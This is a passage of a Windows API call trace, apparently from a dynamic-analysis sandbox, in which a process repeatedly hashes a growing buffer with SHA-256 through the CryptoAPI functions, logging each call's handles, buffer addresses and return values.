	[0192.539] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301ba8
	[0192.539] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301ba8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301ba8, pdwDataLen=0x1283b0) returned 1
	[0192.539] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.539] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.539] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.540] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.540] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0192.540] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.540] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301bd0
	[0192.540] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301bd0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301bd0, pdwDataLen=0x1283b0) returned 1
	[0192.540] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.540] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.540] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.541] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.541] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0192.541] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.541] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301bf8
	[0192.541] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301bf8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301bf8, pdwDataLen=0x1283b0) returned 1
	[0192.541] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.541] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.541] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.541] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.541] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0192.541] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.541] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301c20
	[0192.541] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301c20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301c20, pdwDataLen=0x1283b0) returned 1
	[0192.542] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.542] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.542] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.542] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.542] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0192.542] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.542] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301c48
	[0192.542] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301c48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301c48, pdwDataLen=0x1283b0) returned 1
	[0192.542] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.542] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.542] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.543] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.543] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0192.543] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.543] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301c70
	[0192.543] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301c70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301c70, pdwDataLen=0x1283b0) returned 1
	[0192.543] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.543] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.543] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.544] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.544] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0192.544] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.544] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301c98
	[0192.544] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301c98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301c98, pdwDataLen=0x1283b0) returned 1
	[0192.544] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.544] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.544] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.545] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.545] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0192.545] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.545] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301cc0
	[0192.545] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301cc0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301cc0, pdwDataLen=0x1283b0) returned 1
	[0192.545] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.545] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.545] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.545] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.545] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0192.546] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.546] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301ce8
	[0192.546] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301ce8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301ce8, pdwDataLen=0x1283b0) returned 1
	[0192.546] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.546] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.546] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.546] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.546] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0192.546] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.546] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301d10
	[0192.546] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301d10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301d10, pdwDataLen=0x1283b0) returned 1
	[0192.546] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.547] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.547] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.547] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.547] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0192.547] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.547] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301d38
	[0192.547] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301d38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301d38, pdwDataLen=0x1283b0) returned 1
	[0192.547] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.547] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.547] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.548] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.548] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0192.548] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301d60
	[0192.548] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301d60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301d60, pdwDataLen=0x1283b0) returned 1
	[0192.548] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.548] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.548] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.549] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.549] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0192.549] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.549] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301d88
	[0192.549] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301d88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301d88, pdwDataLen=0x1283b0) returned 1
	[0192.549] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.549] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.549] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.550] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.550] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0192.550] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.550] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301db0
	[0192.550] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301db0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301db0, pdwDataLen=0x1283b0) returned 1
	[0192.550] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.550] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.550] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.550] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.550] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0192.551] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.551] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301dd8
	[0192.551] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301dd8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301dd8, pdwDataLen=0x1283b0) returned 1
	[0192.551] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.551] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.551] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.551] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.551] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0192.551] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.552] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301e00
	[0192.552] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301e00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301e00, pdwDataLen=0x1283b0) returned 1
	[0192.552] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.552] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.552] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.552] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.552] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0192.552] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.552] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301e28
	[0192.552] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301e28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301e28, pdwDataLen=0x1283b0) returned 1
	[0192.552] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.552] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.552] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.553] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.553] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0192.553] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.553] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301e50
	[0192.553] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301e50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301e50, pdwDataLen=0x1283b0) returned 1
	[0192.553] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.553] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.553] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.554] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.554] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0192.554] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.554] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301e78
	[0192.554] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301e78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301e78, pdwDataLen=0x1283b0) returned 1
	[0192.554] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.554] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.554] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.555] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.555] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0192.555] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.555] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301ea0
	[0192.555] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301ea0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301ea0, pdwDataLen=0x1283b0) returned 1
	[0192.555] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.555] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.555] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.555] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.556] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0192.556] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301ec8
	[0192.556] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301ec8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301ec8, pdwDataLen=0x1283b0) returned 1
	[0192.556] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.556] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.556] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.556] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.556] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0192.556] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301ef0
	[0192.556] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301ef0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301ef0, pdwDataLen=0x1283b0) returned 1
	[0192.557] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.557] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.557] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.557] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.557] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0192.557] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301f18
	[0192.557] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301f18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301f18, pdwDataLen=0x1283b0) returned 1
	[0192.557] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.557] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.557] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.558] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.558] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0192.558] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301f40
	[0192.558] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301f40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301f40, pdwDataLen=0x1283b0) returned 1
	[0192.558] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.558] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.558] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.559] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.559] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0192.559] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.559] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301f68
	[0192.559] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301f68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301f68, pdwDataLen=0x1283b0) returned 1
	[0192.559] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.559] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.559] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.560] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.560] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0192.560] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
